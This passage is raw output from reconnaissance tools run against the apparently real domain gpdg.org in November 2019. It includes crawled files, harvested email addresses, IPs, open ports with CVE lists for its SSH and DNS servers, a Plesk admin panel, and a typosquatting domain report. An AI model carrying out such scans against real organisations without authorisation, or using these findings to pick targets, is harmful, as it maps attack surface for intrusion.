1210 - http://www.gpdg.org./tablet/css/master_fullscreen-slideshow.css?crc=4008164137
1211 - http://www.gpdg.org./tablet/css/master_les-ordres_master.css?crc=274129406
1212 - http://www.gpdg.org./tablet/css/master_master.css?crc=3791109957
1213 - http://www.gpdg.org./tablet/css/publications.css?crc=3834020336
1214 - http://www.gpdg.org./tablet/css/question-reponses.css?crc=317273281
1215 - http://www.gpdg.org./tablet/css/tablette-ree.css?crc=3965227374
1216 - http://www.gpdg.org./tablet/css/tablette-rer.css?crc=3966483638
1217 - http://www.gpdg.org./tablet/css/tablette-rf.css?crc=4164107124
1218 Total links to files: 71
1219
1220+ Externals links found:
1221 - http://gpdg.org/a-propos.html
1222 - http://gpdg.org/contact.html
1223 - http://gpdg.org/editos.html
1224 - http://gpdg.org/index.html
1225 - http://gpdg.org/phone/a-propos.html
1226 - http://gpdg.org/phone/contact.html
1227 - http://gpdg.org/phone/editos.html
1228 - http://gpdg.org/phone/index.html
1229 - http://gpdg.org/phone/publications.html
1230 - http://gpdg.org/phone/rite-francais.html
1231 - http://gpdg.org/publications.html
1232 - http://gpdg.org/tablet/a-propos.html
1233 - http://gpdg.org/tablet/contact.html
1234 - http://gpdg.org/tablet/editos.html
1235 - http://gpdg.org/tablet/index.html
1236 - http://gpdg.org/tablet/publications.html
1237 - http://musecdn.businesscatalyst.com/scripts/4.0/jquery-1.8.3.min.js
1238 - https://webfonts.creativecloud.com/open-sans:n3,i4,n4:all.js
1239 - https://webfonts.creativecloud.com/open-sans:n3,n4,i4:all.js
1240 - https://webfonts.creativecloud.com/open-sans:n3,n4:all.js
1241 - https://webfonts.creativecloud.com/open-sans:n3:all.js
1242 - https://webfonts.creativecloud.com/open-sans:n4,n3,i4:all.js
1243 - https://webfonts.creativecloud.com/open-sans:n4:all.js
1244 Total external links: 23
1245
1246+ Email addresses found:
1247 Total email address found: 0
1248
1249+ Directories found:
1250 - http://www.gpdg.org./assets/ (403 Forbidden)
1251 - http://www.gpdg.org./css/ (403 Forbidden)
1252 - http://www.gpdg.org./images/ (403 Forbidden)
1253 - http://www.gpdg.org./scripts/ (403 Forbidden)
1254 - http://www.gpdg.org./tablet/ (No open folder)
1255 - http://www.gpdg.org./tablet/css/ (403 Forbidden)
1256 Total directories: 6
1257
1258+ Directory indexing found:
1259 Total directories with indexing: 0
1260
1261----------------------------------------------------------------------
1262
1263
1264 + URL to crawl: http://mail.gpdg.org.
1265 + Date: 2019-11-25
1266
1267 + Crawling URL: http://mail.gpdg.org.:
1268 + Links:
1269 + Crawling http://mail.gpdg.org.
1270 + Searching for directories...
1271 - Found: http://mail.gpdg.org./css/
1272 - Found: http://mail.gpdg.org./img/
1273 + Searching open folders...
1274 - http://mail.gpdg.org./css/ (403 Forbidden)
1275 - http://mail.gpdg.org./img/ (403 Forbidden)
1276
1277
1278 + URL to crawl: https://mail.gpdg.org
1279 + Date: 2019-11-25
1280
1281 + Crawling URL: https://mail.gpdg.org:
1282 + Links:
1283 + Crawling https://mail.gpdg.org ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1284 + Searching for directories...
1285 + Searching open folders...
1286
1287
1288 + URL to crawl: https://webmail.gpdg.org.
1289 + Date: 2019-11-25
1290
1291 + Crawling URL: https://webmail.gpdg.org.:
1292 + Links:
1293 + Crawling https://webmail.gpdg.org. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1294 + Searching for directories...
1295 + Searching open folders...
1296
1297
1298 + URL to crawl: https://www.gpdg.org.
1299 + Date: 2019-11-25
1300
1301 + Crawling URL: https://www.gpdg.org.:
1302 + Links:
1303 + Crawling https://www.gpdg.org. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1304 + Searching for directories...
1305 + Searching open folders...
1306
1307
1308 + URL to crawl: https://mail.gpdg.org.
1309 + Date: 2019-11-25
1310
1311 + Crawling URL: https://mail.gpdg.org.:
1312 + Links:
1313 + Crawling https://mail.gpdg.org. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1314 + Searching for directories...
1315 + Searching open folders...
1316
1317
1318 + URL to crawl: https://mail.gpdg.org:8443
1319 + Date: 2019-11-25
1320
1321 + Crawling URL: https://mail.gpdg.org:8443:
1322 + Links:
1323 + Crawling https://mail.gpdg.org:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1324 + Searching for directories...
1325 + Searching open folders...
1326
1327
1328 + URL to crawl: https://webmail.gpdg.org.:8443
1329 + Date: 2019-11-25
1330
1331 + Crawling URL: https://webmail.gpdg.org.:8443:
1332 + Links:
1333 + Crawling https://webmail.gpdg.org.:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1334 + Searching for directories...
1335 + Searching open folders...
1336
1337
1338 + URL to crawl: https://www.gpdg.org.:8443
1339 + Date: 2019-11-25
1340
1341 + Crawling URL: https://www.gpdg.org.:8443:
1342 + Links:
1343 + Crawling https://www.gpdg.org.:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1344 + Searching for directories...
1345 + Searching open folders...
1346
1347
1348 + URL to crawl: https://mail.gpdg.org.:8443
1349 + Date: 2019-11-25
1350
1351 + Crawling URL: https://mail.gpdg.org.:8443:
1352 + Links:
1353 + Crawling https://mail.gpdg.org.:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1354 + Searching for directories...
1355 + Searching open folders...
1356
1357--Finished--
1358Summary information for domain gpdg.org.
1359-----------------------------------------
1360 Domain Specific Information:
1361 Email: gpdg@gpdg.org.
1362 Email: contact@gpdg.org.
1363 Email: publications@gpdg.org.
1364 Email: publications@gpdg.org
1365
1366 Domain Ips Information:
1367 IP: 92.39.247.11
1368 HostName: mail.gpdg.org Type: MX
1369 HostName: vps2330-cloud.sd-france.net Type: PTR
1370 HostName: www.gpdg.org. Type: A
1371 HostName: mail.gpdg.org. Type: A
1372 HostName: webmail.gpdg.org. Type: A
1373 Country: France
1374 Is Active: True (reset ttl 64)
1375 Port: 22/tcp open ssh syn-ack ttl 48 OpenSSH 7.4 (protocol 2.0)
1376 Script Info: | ssh-hostkey:
1377 Script Info: | 2048 99:10:45:08:e5:db:22:bc:1d:6c:f1:a7:67:87:93:a7 (RSA)
1378 Script Info: | 256 9a:f2:bd:9d:64:f8:4a:d8:5a:5a:9e:60:bd:45:a4:f0 (ECDSA)
1379 Script Info: |_ 256 e1:38:2c:40:af:ec:e0:74:ea:a1:f1:61:b1:b5:ec:83 (ED25519)
1380 Script Info: | vulners:
1381 Script Info: | cpe:/a:openbsd:openssh:7.4:
1382 Script Info: | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
1383 Script Info: |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1384 Port: 53/tcp open domain syn-ack ttl 48 (unknown banner: none)
1385 Script Info: | dns-nsid:
1386 Script Info: |_ bind.version: none
1387 Script Info: | fingerprint-strings:
1388 Script Info: | DNSVersionBindReqTCP:
1389 Script Info: | version
1390 Script Info: | bind
1391 Script Info: |_ none
1392 Port: 80/tcp open http syn-ack ttl 48 nginx
1393 Script Info: |_http-favicon: Parallels Plesk
1394 Script Info: | http-methods:
1395 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1396 Script Info: |_http-title: Web Server's Default Page
1397 Port: 106/tcp open pop3pw syn-ack ttl 48 poppassd
1398 Port: 110/tcp open pop3 syn-ack ttl 48 Courier pop3d
1399 Script Info: |_pop3-capabilities: UIDL STLS TOP LOGIN-DELAY(10) SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) APOP USER IMPLEMENTATION(Courier Mail Server) PIPELINING
1400 Script Info: |_ssl-date: TLS randomness does not represent time
1401 Port: 143/tcp open imap syn-ack ttl 48 Courier Imapd (released 2017)
1402 Script Info: |_imap-capabilities: CAPABILITY IDLE completed AUTH=CRAM-MD5 THREAD=REFERENCES NAMESPACE STARTTLSA0001 OK QUOTA CHILDREN AUTH=PLAIN THREAD=ORDEREDSUBJECT SORT IMAP4rev1 ACL2=UNION AUTH=CRAM-SHA1 ACL AUTH=CRAM-SHA256 UIDPLUS
1403 Script Info: |_ssl-date: TLS randomness does not represent time
1404 Port: 443/tcp open ssl/http syn-ack ttl 48 nginx
1405 Script Info: | http-methods:
1406 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1407 Script Info: |_http-title: Web Server's Default Page
1408 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1409 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1410 Script Info: | Public Key type: rsa
1411 Script Info: | Public Key bits: 2048
1412 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1413 Script Info: | Not valid before: 2019-04-01T15:36:51
1414 Script Info: | Not valid after: 2020-03-31T15:36:51
1415 Script Info: | MD5: 8927 363d c7b5 30fc 11f9 e56a 3db1 62c0
1416 Script Info: |_SHA-1: 5da0 817d 7f4d ecbd 7d5c 4ed1 ad84 67db 5efa aba7
1417 Script Info: |_ssl-date: TLS randomness does not represent time
1418 Script Info: | tls-alpn:
1419 Script Info: | h2
1420 Script Info: |_ http/1.1
1421 Script Info: | tls-nextprotoneg:
1422 Script Info: | h2
1423 Script Info: |_ http/1.1
1424 Port: 465/tcp open ssl/smtps? syn-ack ttl 48
1425 Script Info: |_smtp-commands: Couldn't establish connection on port 465
1426 Script Info: |_ssl-date: TLS randomness does not represent time
1427 Port: 993/tcp open ssl/imaps? syn-ack ttl 48
1428 Script Info: |_ssl-date: TLS randomness does not represent time
1429 Port: 995/tcp open ssl/pop3s? syn-ack ttl 48
1430 Script Info: |_ssl-date: TLS randomness does not represent time
1431 Port: 8443/tcp open ssl/http syn-ack ttl 48 sw-cp-server httpd (Plesk Onyx 17.8.11)
1432 Script Info: | http-methods:
1433 Script Info: |_ Supported Methods: GET HEAD POST
1434 Script Info: | http-robots.txt: 1 disallowed entry
1435 Script Info: |_/
1436 Script Info: |_http-server-header: sw-cp-server
1437 Script Info: |_http-title: Plesk Onyx 17.8.11
1438 Script Info: | ssl-cert: Subject: commonName=Plesk/organizationName=Plesk/countryName=CH
1439 Script Info: | Issuer: commonName=Plesk/organizationName=Plesk/countryName=CH
1440 Script Info: | Public Key type: rsa
1441 Script Info: | Public Key bits: 2048
1442 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1443 Script Info: | Not valid before: 2019-04-01T15:36:51
1444 Script Info: | Not valid after: 2020-03-31T15:36:51
1445 Script Info: | MD5: 8927 363d c7b5 30fc 11f9 e56a 3db1 62c0
1446 Script Info: |_SHA-1: 5da0 817d 7f4d ecbd 7d5c 4ed1 ad84 67db 5efa aba7
1447 Script Info: |_ssl-date: TLS randomness does not represent time
1448 Script Info: | tls-alpn:
1449 Script Info: |_ http/1.1
1450 Script Info: | tls-nextprotoneg:
1451 Script Info: |_ http/1.1
1452 Os Info: Host: localhost.localdomain
1453 IP: 46.21.205.95
1454 HostName: ns4.dns26.net Type: NS
1455 HostName: ns4.dns26.net Type: PTR
1456 Country: France
1457 Is Active: True (reset ttl 64)
1458 Port: 53/tcp open domain syn-ack ttl 52 ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
1459 Script Info: | dns-nsid:
1460 Script Info: |_ bind.version: 9.9.4-RedHat-9.9.4-38.el7_3.2
1461 Script Info: | vulners:
1462 Script Info: | cpe:/a:isc:bind:9.9.4:
1463 Script Info: | CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
1464 Script Info: | CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
1465 Script Info: | CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
1466 Script Info: | CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
1467 Script Info: | CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
1468 Script Info: | CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
1469 Script Info: | CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
1470 Script Info: | CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
1471 Script Info: | CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
1472 Script Info: | CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
1473 Script Info: | CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
1474 Script Info: | CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
1475 Script Info: | CVE-2019-6465 4.3 https://vulners.com/cve/CVE-2019-6465
1476 Script Info: | CVE-2018-5743 4.3 https://vulners.com/cve/CVE-2018-5743
1477 Script Info: | CVE-2018-5742 4.3 https://vulners.com/cve/CVE-2018-5742
1478 Script Info: | CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
1479 Script Info: | CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
1480 Script Info: | CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
1481 Script Info: | CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
1482 Script Info: | CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
1483 Script Info: | CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
1484 Script Info: | CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
1485 Script Info: | CVE-2018-5745 3.5 https://vulners.com/cve/CVE-2018-5745
1486 Script Info: |_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
1487 Os Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
1488 IP: 188.130.45.112
1489 HostName: ns3.dns26.net Type: NS
1490 HostName: ns3.dns26.net Type: PTR
1491 Country: France
1492 Is Active: True (reset ttl 64)
1493 Port: 53/tcp open domain syn-ack ttl 51 ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
1494 Script Info: | dns-nsid:
1495 Script Info: |_ bind.version: 9.9.4-RedHat-9.9.4-38.el7_3.2
1496 Script Info: | vulners:
1497 Script Info: | cpe:/a:isc:bind:9.9.4:
1498 Script Info: | CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
1499 Script Info: | CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
1500 Script Info: | CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
1501 Script Info: | CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
1502 Script Info: | CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
1503 Script Info: | CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
1504 Script Info: | CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
1505 Script Info: | CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
1506 Script Info: | CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
1507 Script Info: | CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
1508 Script Info: | CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
1509 Script Info: | CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
1510 Script Info: | CVE-2019-6465 4.3 https://vulners.com/cve/CVE-2019-6465
1511 Script Info: | CVE-2018-5743 4.3 https://vulners.com/cve/CVE-2018-5743
1512 Script Info: | CVE-2018-5742 4.3 https://vulners.com/cve/CVE-2018-5742
1513 Script Info: | CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
1514 Script Info: | CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
1515 Script Info: | CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
1516 Script Info: | CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
1517 Script Info: | CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
1518 Script Info: | CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
1519 Script Info: | CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
1520 Script Info: | CVE-2018-5745 3.5 https://vulners.com/cve/CVE-2018-5745
1521 Script Info: |_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
1522 Os Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
1523#######################################################################################################################################
1524URLCrazy Domain Report
1525Domain : www.gpdg.org
1526Keyboard : qwerty
1527At : 2019-11-25 11:18:07 -0500
1528
1529# Please wait. 104 hostnames to process
1530
1531Typo Type Typo DNS-A CC-A DNS-MX Extn
1532----------------------------------------------------------------------------------------------------------------------------------------
1533Character Omission ww.gpdg.org ? org
1534Character Omission www.gdg.org 192.254.151.85 gdg.org org
1535Character Omission www.gpd.org 141.8.224.195 CH,SWITZERLAND org
1536Character Omission www.gpg.org 52.210.213.169 US,UNITED STATES east.smtp.mx.exch027.serverdata.net org
1537Character Omission www.pdg.org 35.186.238.101 US,UNITED STATES org
1538Character Omission wwwgpdg.org ? org
1539Character Repeat www.ggpdg.org ? org
1540Character Repeat www.gpddg.org ? org
1541Character Repeat www.gpdgg.org ? org
1542Character Repeat www.gppdg.org ? org
1543Character Repeat wwww.gpdg.org ? org
1544Character Swap ww.wgpdg.org ? org
1545Character Swap www.gdpg.org 35.186.238.101 US,UNITED STATES org
1546Character Swap www.gpgd.org ? org
1547Character Swap www.pgdg.org ? org
1548Character Swap wwwg.pdg.org 35.186.238.101 US,UNITED STATES org
1549Character Replacement eww.gpdg.org ? org
1550Character Replacement qww.gpdg.org ? org
1551Character Replacement wew.gpdg.org ? org
1552Character Replacement wqw.gpdg.org ? org
1553Character Replacement wwe.gpdg.org ? org
1554Character Replacement wwq.gpdg.org ? org
1555Character Replacement www.fpdg.org 172.217.21.243 US,UNITED STATES org
1556Character Replacement www.godg.org ? org
1557Character Replacement www.gpdf.org 35.186.238.101 US,UNITED STATES org
1558Character Replacement www.gpdh.org 129.174.131.144 US,UNITED STATES org
1559Character Replacement www.gpfg.org 45.203.100.89 org
1560Character Replacement www.gpsg.org 67.222.43.223 US,UNITED STATES gpsg.org org
1561Character Replacement www.hpdg.org 50.63.202.45 US,UNITED STATES smtp.secureserver.net org
1562Double Character Replacement eew.gpdg.org ? org
1563Double Character Replacement qqw.gpdg.org ? org
1564Double Character Replacement wee.gpdg.org ? org
1565Double Character Replacement wqq.gpdg.org ? org
1566Character Insertion weww.gpdg.org ? org
1567Character Insertion wqww.gpdg.org ? org
1568Character Insertion wwew.gpdg.org ? org
1569Character Insertion wwqw.gpdg.org ? org
1570Character Insertion www.gfpdg.org ? org
1571Character Insertion www.ghpdg.org ? org
1572Character Insertion www.gpdfg.org ? org
1573Character Insertion www.gpdgf.org ? org
1574Character Insertion www.gpdgh.org ? org
1575Character Insertion www.gpdsg.org ? org
1576Character Insertion www.gpodg.org ? org
1577Character Insertion wwwe.gpdg.org ? org
1578Character Insertion wwwq.gpdg.org ? org
1579Missing Dot wwwwww.gpdg.org ? org
1580Singular or Pluralise gpdg.org 92.39.247.11 FR,FRANCE mail.gpdg.org org
1581Singular or Pluralise gpdgs.org ? org
1582Bit Flipping 7ww.gpdg.org ? org
1583Bit Flipping gww.gpdg.org ? org
1584Bit Flipping sww.gpdg.org ? org
1585Bit Flipping uww.gpdg.org ? org
1586Bit Flipping vww.gpdg.org ? org
1587Bit Flipping w7w.gpdg.org ? org
1588Bit Flipping wgw.gpdg.org ? org
1589Bit Flipping wsw.gpdg.org ? org
1590Bit Flipping wuw.gpdg.org ? org
1591Bit Flipping wvw.gpdg.org ? org
1592Bit Flipping ww7.gpdg.org ? org
1593Bit Flipping wwg.gpdg.org ? org
1594Bit Flipping wws.gpdg.org ? org
1595Bit Flipping wwu.gpdg.org ? org
1596Bit Flipping wwv.gpdg.org ? org
1597Bit Flipping www.cpdg.org 52.4.209.250 US,UNITED STATES org
1598Bit Flipping www.epdg.org 138.207.69.74 US,UNITED STATES org
1599Bit Flipping www.g0dg.org ? org
1600Bit Flipping www.gpdc.org 162.255.138.22 mail.guardianshipprogram.org org
1601Bit Flipping www.gpde.org 35.186.238.101 US,UNITED STATES org
1602Bit Flipping www.gpdo.org ? org
1603Bit Flipping www.gpdw.org ? org
1604Bit Flipping www.gpeg.org 208.91.197.27 VG,VIRGIN ISLANDS (BRITISH) org
1605Bit Flipping www.gplg.org 173.193.127.90 US,UNITED STATES org
1606Bit Flipping www.gptg.org 207.148.248.143 US,UNITED STATES org
1607Bit Flipping www.gqdg.org ? org
1608Bit Flipping www.grdg.org ? org
1609Bit Flipping www.gtdg.org ? org
1610Bit Flipping www.gxdg.org ? org
1611Bit Flipping www.opdg.org 192.3.201.85 opdg.org org
1612Bit Flipping www.wpdg.org ? org
1613Bit Flipping wwwngpdg.org ? org
1614Homoglyphs vvvvvv.gpdg.org ? org
1615Homoglyphs vvvvw.gpdg.org ? org
1616Homoglyphs vvwvv.gpdg.org ? org
1617Homoglyphs vvww.gpdg.org ? org
1618Homoglyphs wvvvv.gpdg.org ? org
1619Homoglyphs wvvw.gpdg.org ? org
1620Homoglyphs wwvv.gpdg.org ? org
1621Homoglyphs www.gpclg.org ? org
1622Wrong TLD gpdg.ca ? ca
1623Wrong TLD gpdg.ch ? ch
1624Wrong TLD gpdg.com 92.39.247.11 FR,FRANCE mail.gpdg.com com
1625Wrong TLD gpdg.de ? de
1626Wrong TLD gpdg.edu ? edu
1627Wrong TLD gpdg.es ? es
1628Wrong TLD gpdg.fr 92.39.247.11 FR,FRANCE mail.gpdg.fr fr
1629Wrong TLD gpdg.it ? it
1630Wrong TLD gpdg.jp ? jp
1631Wrong TLD gpdg.net 92.39.247.11 FR,FRANCE mail.gpdg.net net
1632Wrong TLD gpdg.nl ? nl
1633Wrong TLD gpdg.no ? no
1634Wrong TLD gpdg.ru ? ru
1635Wrong TLD gpdg.se ? se
1636Wrong TLD gpdg.us ? us
1637#######################################################################################################################################
1638[*] Processing domain www.gpdg.org
1639[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
1640[+] Getting nameservers
1641[-] Getting nameservers failed
1642[-] Zone transfer failed
1643
1644[*] Scanning www.gpdg.org for A records
164592.39.247.11 - www.gpdg.org
1646#######################################################################################################################################
1647Privileges have been dropped to "nobody:nogroup" for security reasons.
1648
1649Processed queries: 0
1650Received packets: 0
1651Progress: 0.00% (00 h 00 min 00 sec / 00 h 00 min 00 sec)
1652Current incoming rate: 0 pps, average: 0 pps
1653Current success rate: 0 pps, average: 0 pps
1654Finished total: 0, success: 0 (0.00%)
1655Mismatched domains: 0 (0.00%), IDs: 0 (0.00%)
1656Failures: 0: 0.00%, 1: 0.00%, 2: 0.00%, 3: 0.00%, 4: 0.00%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1657Response: | Success: | Total:
1658OK: | 0 ( 0.00%) | 0 ( 0.00%)
1659NXDOMAIN: | 0 ( 0.00%) | 0 ( 0.00%)
1660SERVFAIL: | 0 ( 0.00%) | 0 ( 0.00%)
1661REFUSED: | 0 ( 0.00%) | 0 ( 0.00%)
1662FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1663
1664
1665
1666Processed queries: 1919
1667Received packets: 1376
1668Progress: 100.00% (00 h 00 min 01 sec / 00 h 00 min 01 sec)
1669Current incoming rate: 1374 pps, average: 1374 pps
1670Current success rate: 906 pps, average: 906 pps
1671Finished total: 907, success: 907 (100.00%)
1672Mismatched domains: 56 (4.09%), IDs: 0 (0.00%)
1673Failures: 0: 37.93%, 1: 144.10%, 2: 24.15%, 3: 5.18%, 4: 0.22%, 5: 0.00%, 6: 0.00%, 7: 0.00%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1674Response: | Success: | Total:
1675OK: | 83 ( 9.15%) | 89 ( 6.50%)
1676NXDOMAIN: | 804 ( 88.64%) | 842 ( 61.50%)
1677SERVFAIL: | 20 ( 2.21%) | 20 ( 1.46%)
1678REFUSED: | 0 ( 0.00%) | 418 ( 30.53%)
1679FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1680
1681
1682
1683Processed queries: 1919
1684Received packets: 2595
1685Progress: 100.00% (00 h 00 min 02 sec / 00 h 00 min 02 sec)
1686Current incoming rate: 1216 pps, average: 1295 pps
1687Current success rate: 784 pps, average: 845 pps
1688Finished total: 1693, success: 1693 (100.00%)
1689Mismatched domains: 234 (9.06%), IDs: 0 (0.00%)
1690Failures: 0: 20.32%, 1: 30.83%, 2: 27.64%, 3: 22.68%, 4: 9.04%, 5: 2.54%, 6: 0.24%, 7: 0.06%, 8: 0.00%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1691Response: | Success: | Total:
1692OK: | 145 ( 8.56%) | 159 ( 6.15%)
1693NXDOMAIN: | 1509 ( 89.13%) | 1681 ( 65.05%)
1694SERVFAIL: | 39 ( 2.30%) | 40 ( 1.55%)
1695REFUSED: | 0 ( 0.00%) | 704 ( 27.24%)
1696FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1697
1698
1699
1700Processed queries: 1919
1701Received packets: 2898
1702Progress: 100.00% (00 h 00 min 03 sec / 00 h 00 min 03 sec)
1703Current incoming rate: 302 pps, average: 964 pps
1704Current success rate: 177 pps, average: 622 pps
1705Finished total: 1871, success: 1871 (100.00%)
1706Mismatched domains: 302 (10.46%), IDs: 0 (0.00%)
1707Failures: 0: 18.39%, 1: 27.90%, 2: 25.01%, 3: 14.97%, 4: 7.48%, 5: 5.08%, 6: 2.41%, 7: 1.12%, 8: 0.21%, 9: 0.00%, 10: 0.00%, 11: 0.00%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1708Response: | Success: | Total:
1709OK: | 159 ( 8.50%) | 173 ( 5.99%)
1710NXDOMAIN: | 1671 ( 89.31%) | 1901 ( 65.87%)
1711SERVFAIL: | 41 ( 2.19%) | 43 ( 1.49%)
1712REFUSED: | 0 ( 0.00%) | 769 ( 26.65%)
1713FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1714
1715
1716
1717Processed queries: 1919
1718Received packets: 2965
1719Progress: 100.00% (00 h 00 min 04 sec / 00 h 00 min 04 sec)
1720Current incoming rate: 66 pps, average: 739 pps
1721Current success rate: 36 pps, average: 476 pps
1722Finished total: 1908, success: 1908 (100.00%)
1723Mismatched domains: 322 (10.90%), IDs: 0 (0.00%)
